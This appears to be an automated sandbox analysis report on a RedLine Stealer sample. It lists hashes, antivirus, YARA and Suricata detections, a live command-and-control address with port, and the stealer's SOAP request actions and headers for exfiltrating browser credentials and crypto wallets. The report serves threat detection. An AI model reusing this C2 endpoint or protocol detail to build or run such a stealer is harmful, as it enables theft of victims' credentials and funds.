Edit tour

Windows Analysis Report
8ZVd2S51fr.exe

Overview

General Information

Sample name:	8ZVd2S51fr.exe renamed because original name is a hash value
Original sample name:	4376650c9845c351ba30d405b17d3502.exe
Analysis ID:	1561924
MD5:	4376650c9845c351ba30d405b17d3502
SHA1:	5c2d70381a10d51d776365eea6f513a85597b3f3
SHA256:	b3af9675cef7e3a371e7a3d98d141b2bc6cbbc5da2df140dc09cf918ee3c62da
Tags:	exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected RedLine Stealer

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

8ZVd2S51fr.exe (PID: 5452 cmdline: "C:\Users\user\Desktop\8ZVd2S51fr.exe" MD5: 4376650C9845C351BA30D405B17D3502)

8ZVd2S51fr.exe (PID: 5260 cmdline: "C:\Users\user\Desktop\8ZVd2S51fr.exe" MD5: 4376650C9845C351BA30D405B17D3502)

conhost.exe (PID: 6668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.222.58.241:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2090231479.000000000384A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2090231479.000000000384A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.2090231479.000000000384A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x141ea:$a4: get_ScannedWallets 0x13048:$a5: get_ScanTelegram 0x13e6e:$a6: get_ScanGeckoBrowsersPaths 0x11c8a:$a7: <Processes>k__BackingField 0xfb9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x115be:$a9: <ScanFTP>k__BackingField
00000000.00000002.2090231479.000000000374F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2090231479.000000000374F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.2090231479.000000000374F000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x1400a:$a4: get_ScannedWallets 0x12e68:$a5: get_ScanTelegram 0x13c8e:$a6: get_ScanGeckoBrowsersPaths 0x11aaa:$a7: <Processes>k__BackingField 0xf9bc:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x113de:$a9: <ScanFTP>k__BackingField
00000003.00000002.2329442036.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2329442036.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000003.00000002.2329442036.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 8ZVd2S51fr.exe PID: 5452	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 8ZVd2S51fr.exe PID: 5452	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 8ZVd2S51fr.exe PID: 5452	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 8ZVd2S51fr.exe PID: 5452	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x2e6bc:$a4: get_ScannedWallets 0x40a14:$a4: get_ScannedWallets 0x2d563:$a5: get_ScanTelegram 0x3f8bb:$a5: get_ScanTelegram 0x2e345:$a6: get_ScanGeckoBrowsersPaths 0x4069d:$a6: get_ScanGeckoBrowsersPaths 0x2c1f6:$a7: <Processes>k__BackingField 0x3e54e:$a7: <Processes>k__BackingField 0x29729:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x3ba81:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x2bb2a:$a9: <ScanFTP>k__BackingField 0x3de82:$a9: <ScanFTP>k__BackingField
Process Memory Space: 8ZVd2S51fr.exe PID: 5260	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 8ZVd2S51fr.exe PID: 5260	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 8ZVd2S51fr.exe PID: 5260	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x49acc3:$a4: get_ScannedWallets 0x499b6a:$a5: get_ScanTelegram 0x49a94c:$a6: get_ScanGeckoBrowsersPaths 0x4987fd:$a7: <Processes>k__BackingField 0x495d30:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x498131:$a9: <ScanFTP>k__BackingField
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.8ZVd2S51fr.exe.384ac20.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.8ZVd2S51fr.exe.384ac20.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.8ZVd2S51fr.exe.384ac20.1.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
0.2.8ZVd2S51fr.exe.384ac20.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ee:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cf:$v2_6: GetUpdates
0.2.8ZVd2S51fr.exe.384ac20.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.8ZVd2S51fr.exe.384ac20.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.8ZVd2S51fr.exe.384ac20.1.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.8ZVd2S51fr.exe.384ac20.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ee:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cf:$v2_6: GetUpdates
3.2.8ZVd2S51fr.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.8ZVd2S51fr.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.2.8ZVd2S51fr.exe.400000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
3.2.8ZVd2S51fr.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ee:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cf:$v2_6: GetUpdates
Click to see the 7 entries

Suricata Signatures

ET MALWARE RedLine Stealer - CheckConnect Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T20:12:08.768750+0100	2045000	1	Malware Command and Control Activity Detected	185.222.58.241	55615	192.168.2.5	49707	TCP

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T20:12:13.365274+0100	2046056	1	A Network Trojan was detected	185.222.58.241	55615	192.168.2.5	49707	TCP

ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T20:12:13.365274+0100	2045001	1	Malware Command and Control Activity Detected	185.222.58.241	55615	192.168.2.5	49707	TCP

ETPRO MALWARE RedLine - CheckConnect Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T20:12:03.389377+0100	2849662	1	Malware Command and Control Activity Detected	192.168.2.5	49707	185.222.58.241	55615	TCP

ETPRO MALWARE RedLine - EnvironmentSettings Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T20:12:09.418109+0100	2849351	1	Malware Command and Control Activity Detected	192.168.2.5	49707	185.222.58.241	55615	TCP

ETPRO MALWARE RedLine - GetUpdates Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T20:12:20.737400+0100	2848200	1	Malware Command and Control Activity Detected	192.168.2.5	49715	185.222.58.241	55615	TCP

ETPRO MALWARE RedLine - SetEnvironment Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T20:12:14.130434+0100	2849352	1	Malware Command and Control Activity Detected	192.168.2.5	49711	185.222.58.241	55615	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 8ZVd2S51fr.exe

Avira: detected

Found malware configuration

Source: 3.2.8ZVd2S51fr.exe.400000.0.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["185.222.58.241:55615"], "Bot Id": "cheat"}

Multi AV Scanner detection for submitted file

Source: 8ZVd2S51fr.exe

ReversingLabs: Detection: 68%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 8ZVd2S51fr.exe

Joe Sandbox ML: detected

Source: 8ZVd2S51fr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 8ZVd2S51fr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe

Code function: 4x nop then jmp 06D19D23h

0_2_06D195FC

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.5:49707 -> 185.222.58.241:55615
Source: Network traffic	Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.5:49711 -> 185.222.58.241:55615
Source: Network traffic	Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.58.241:55615 -> 192.168.2.5:49707
Source: Network traffic	Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.5:49707 -> 185.222.58.241:55615
Source: Network traffic	Suricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.5:49715 -> 185.222.58.241:55615
Source: Network traffic	Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.58.241:55615 -> 192.168.2.5:49707
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.222.58.241:55615 -> 192.168.2.5:49707

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 185.222.58.241:55615

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49715

Source: global traffic

TCP traffic: 192.168.2.5:49707 -> 185.222.58.241:55615

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.241:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.241:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.241:55615Content-Length: 957847Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.241:55615Content-Length: 957839Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Joe Sandbox View

ASN Name: ROOTLAYERNETNL ROOTLAYERNETNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.241

Source: global traffic

DNS traffic detected: DNS query: api.ip.sb

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.241:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000003279000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.241:55615
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.241:55615/
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000003279000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000003279000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000003279000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000003279000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: 8ZVd2S51fr.exe	String found in binary or memory: http://tempuri.org/ianiDataSet.xsd
Source: 8ZVd2S51fr.exe	String found in binary or memory: http://tempuri.org/ianiDataSet1.xsd
Source: 8ZVd2S51fr.exe	String found in binary or memory: http://tempuri.org/ianiDataSet2.xsdM
Source: tmp6AA2.tmp.3.dr, tmpA4A1.tmp.3.dr, tmpDE63.tmp.3.dr, tmpDE62.tmp.3.dr, tmp6A70.tmp.3.dr, tmp6A92.tmp.3.dr, tmpA480.tmp.3.dr, tmpA4B2.tmp.3.dr, tmpDE52.tmp.3.dr, tmpA4C2.tmp.3.dr, tmp6A81.tmp.3.dr, tmpA481.tmp.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 8ZVd2S51fr.exe, 8ZVd2S51fr.exe, 00000003.00000002.2329442036.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: 8ZVd2S51fr.exe, 8ZVd2S51fr.exe, 00000003.00000002.2329442036.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: tmp6AA2.tmp.3.dr, tmpA4A1.tmp.3.dr, tmpDE63.tmp.3.dr, tmpDE62.tmp.3.dr, tmp6A70.tmp.3.dr, tmp6A92.tmp.3.dr, tmpA480.tmp.3.dr, tmpA4B2.tmp.3.dr, tmpDE52.tmp.3.dr, tmpA4C2.tmp.3.dr, tmp6A81.tmp.3.dr, tmpA481.tmp.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmp6AA2.tmp.3.dr, tmpA4A1.tmp.3.dr, tmpDE63.tmp.3.dr, tmpDE62.tmp.3.dr, tmp6A70.tmp.3.dr, tmp6A92.tmp.3.dr, tmpA480.tmp.3.dr, tmpA4B2.tmp.3.dr, tmpDE52.tmp.3.dr, tmpA4C2.tmp.3.dr, tmp6A81.tmp.3.dr, tmpA481.tmp.3.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmp6AA2.tmp.3.dr, tmpA4A1.tmp.3.dr, tmpDE63.tmp.3.dr, tmpDE62.tmp.3.dr, tmp6A70.tmp.3.dr, tmp6A92.tmp.3.dr, tmpA480.tmp.3.dr, tmpA4B2.tmp.3.dr, tmpDE52.tmp.3.dr, tmpA4C2.tmp.3.dr, tmp6A81.tmp.3.dr, tmpA481.tmp.3.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
